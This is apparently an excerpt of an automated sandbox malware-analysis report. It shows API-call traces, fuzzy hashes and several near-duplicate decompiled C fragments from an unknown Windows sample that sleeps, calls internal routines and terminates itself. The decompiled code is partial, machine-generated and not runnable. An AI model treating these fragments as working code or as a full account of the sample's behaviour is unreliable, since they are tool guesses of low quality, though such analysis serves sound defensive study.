                • Instruction Fuzzy Hash: 18B1C774A00208AFDB44CF98C895F9EBBB5FF88314F248158E509AB391D771AE81CF94
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 00820533
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.622893352.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                Similarity
                • API ID: CreateWindow
                • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                • API String ID: 716092398-2341455598
                • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                • Instruction ID: dcad49dd5519ebfdb274b43ae0a39c3ce43354ab70b5504e234b57bb876a97e1
                • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                • Instruction Fuzzy Hash: 85511A70D08388DEEB11CBD8D949BDDBFB2AF11708F144058E5447F286C3BA5658CBA6
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetFileAttributesA.KERNELBASE(apfHQ), ref: 008205EC
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.622893352.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                Similarity
                • API ID: AttributesFile
                • String ID: apfHQ$o
                • API String ID: 3188754299-2999369273
                • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                • Instruction ID: a1c8a9e0b916bd9b36d542a745d89038f5196bf67793f906409db264d460a33f
                • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                • Instruction Fuzzy Hash: EB011E70C0425CEEDF10DBD8D5583AEBFB5AF51309F148099C4096B342D7B69B98CBA2
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 23%
                			E0040180C(void* __eflags, void* __fp0, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                				char _v8;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				void* __ebp;
                				void* _t11;
                				void* _t16;
                				intOrPtr* _t17;
                				void* _t19;
                				void* _t20;
                				void* _t21;
                
                				_t22 = __eflags;
                				L00401140(0x183e, _t16, _t20, _t21, __eflags, __fp0);
                				_t17 = _a4;
                				Sleep(0x1388);
                				_t11 = E00401381(_t19, _t22, _t17, _a8, _a12,  &_v8); // executed
                				if(_t11 != 0) {
                					_push(_a16);
                					_push(_v8);
                					_push(_t11);
                					_push(_t17); // executed
                					L00401455(0x60, _t19, _t20); // executed
                				}
                				 *_t17(0xffffffff, 0); // executed
                				_t17 = _t17 + 0x60;
                				_push(0x60);
                				asm("pushad");
                				__ecx =  *__esp;
                				__esp = __esp + 4;
                				return __eax;
                			}

                APIs
                • Sleep.KERNELBASE(00001388), ref: 00401846
                • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                Memory Dump Source
                • Source File: 00000006.00000002.633640295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: ProcessSleepTerminate
                • String ID:
                • API String ID: 417527130-0
                • Opcode ID: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
                • Instruction ID: 439418bc6b8cc85bb90c3f715c5c8777bd26b3ffbf7cafd5698f886abb68661d
                • Opcode Fuzzy Hash: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
                • Instruction Fuzzy Hash: DA014F73608208E7DB057A968C41ABA36299B04754F24C137BA13791F1D63DCB12A76B
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • Sleep.KERNELBASE(00001388), ref: 00401846
                • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                Memory Dump Source
                • Source File: 00000006.00000002.633640295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: ProcessSleepTerminate
                • String ID:
                • API String ID: 417527130-0
                • Opcode ID: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
                • Instruction ID: 3ccd72cbf6c862e7ac88a574d3d4d63140f03618044998c1cc11cf15f2003e8a
                • Opcode Fuzzy Hash: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
                • Instruction Fuzzy Hash: F5F03133604204E7DB047E96CC41ABA36199B04754F24C537BA13791F1D63DCB12A76B
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 17%
                			E00401822(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                				void* _t11;
                				intOrPtr* _t17;
                				void* _t19;
                				void* _t22;
                
                				_t23 = __eflags;
                				asm("out 0x95, eax");
                				L00401140(0x183e, __ebx, __edi, __esi, __eflags, __fp0);
                				_t17 =  *((intOrPtr*)(_t22 + 8));
                				Sleep(0x1388);
                				_t11 = E00401381(_t19, _t23, _t17,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
                				if(_t11 != 0) {
                					_push( *((intOrPtr*)(_t22 + 0x14)));
                					_push( *((intOrPtr*)(_t22 - 4)));
                					_push(_t11);
                					_push(_t17); // executed
                					L00401455(0x60, _t19, __edi); // executed
                				}
                				 *_t17(0xffffffff, 0); // executed
                				_t17 = _t17 + 0x60;
                				_push(0x60);
                				asm("pushad");
                				__ecx =  *__esp;
                				__esp = __esp + 4;
                				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                				_pop(__edi);
                				_pop(__esi);
                				_pop(__ebx);
                				__esp = __ebp;
                				_pop(__ebp);
                				return __eax;
                			}

                APIs
                • Sleep.KERNELBASE(00001388), ref: 00401846
                • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                Memory Dump Source
                • Source File: 00000006.00000002.633640295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: ProcessSleepTerminate
                • String ID:
                • API String ID: 417527130-0
                • Opcode ID: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
                • Instruction ID: 86529ff08739d4d45ab2b2fe3aa627bb4dd9aa569924de5dc1b0fc6937d585b1
                • Opcode Fuzzy Hash: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
                • Instruction Fuzzy Hash: FEF03133604204EBDB047E96C841ABA36299B44754F24C537BA13B91F1D63DCB12A76B
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 17%
                			E00401826(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                				void* _t8;
                				void* _t11;
                				intOrPtr* _t17;
                				void* _t19;
                				void* _t22;
                
                				_t23 = __eflags;
                				asm("sbb ebx, ebp");
                				L00401140(_t8, __ebx, __edi, __esi, __eflags, __fp0);
                				_t17 =  *((intOrPtr*)(_t22 + 8));
                				Sleep(0x1388);
                				_t11 = E00401381(_t19, _t23, _t17,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
                				if(_t11 != 0) {
                					_push( *((intOrPtr*)(_t22 + 0x14)));
                					_push( *((intOrPtr*)(_t22 - 4)));
                					_push(_t11);
                					_push(_t17); // executed
                					L00401455(0x60, _t19, __edi); // executed
                				}
                				 *_t17(0xffffffff, 0); // executed
                				_t17 = _t17 + 0x60;
                				_push(0x60);
                				asm("pushad");
                				__ecx =  *__esp;
                				__esp = __esp + 4;
                				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                				_pop(__edi);
                				_pop(__esi);
                				_pop(__ebx);
                				__esp = __ebp;
                				_pop(__ebp);
                				return __eax;
                			}

                APIs
                • Sleep.KERNELBASE(00001388), ref: 00401846
                • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                Memory Dump Source
                • Source File: 00000006.00000002.633640295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: ProcessSleepTerminate
                • String ID:
                • API String ID: 417527130-0
                • Opcode ID: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
                • Instruction ID: 61297dcd7f948f961e89af5f5716b1062d194a974c17104e1ab0fce138cf61ec
                • Opcode Fuzzy Hash: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
                • Instruction Fuzzy Hash: C4F04F33604208A7DB04BE96CC41AAA3719AB04754F248537BB13791E1DA3DCB12A72B
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 20%
                			E00401834(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                				void* _t10;
                				void* _t13;
                				intOrPtr* _t19;
                				void* _t22;
                				void* _t25;
                
                				_t26 = __eflags;
                				L00401140(_t10, __ebx, __edi, __esi, __eflags, __fp0);
                				_t19 =  *((intOrPtr*)(_t25 + 8));
                				Sleep(0x1388);
                				_t13 = E00401381(_t22, _t26, _t19,  *((intOrPtr*)(_t25 + 0xc)),  *((intOrPtr*)(_t25 + 0x10)), _t25 - 4); // executed
                				if(_t13 != 0) {
                					_push( *((intOrPtr*)(_t25 + 0x14)));
                					_push( *((intOrPtr*)(_t25 - 4)));
                					_push(_t13);
                					_push(_t19); // executed
                					L00401455(0x60, _t22, __edi); // executed
                				}
                				 *_t19(0xffffffff, 0); // executed
                				_t19 = _t19 + 0x60;
                				_push(0x60);
                				asm("pushad");
                				__ecx =  *__esp;
                				__esp = __esp + 4;
                				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                				_pop(__edi);
                				_pop(__esi);
                				_pop(__ebx);
                				__esp = __ebp;
                				_pop(__ebp);
                				return __eax;
                			}

                APIs
                • Sleep.KERNELBASE(00001388), ref: 00401846
                • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                Memory Dump Source
                • Source File: 00000006.00000002.633640295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: ProcessSleepTerminate
                • String ID:
                • API String ID: 417527130-0
                • Opcode ID: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
                • Instruction ID: 4e4f5f6328981cf1385f7e82c295c95f43d6d852bc8dfc3b1875bfb827a549ac
                • Opcode Fuzzy Hash: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
                • Instruction Fuzzy Hash: BDF04932604208ABDB04BF92CC81ABA3329AB04754F248537BA12790F1D639C612A72B
                Uniqueness

                Uniqueness Score: -1.00%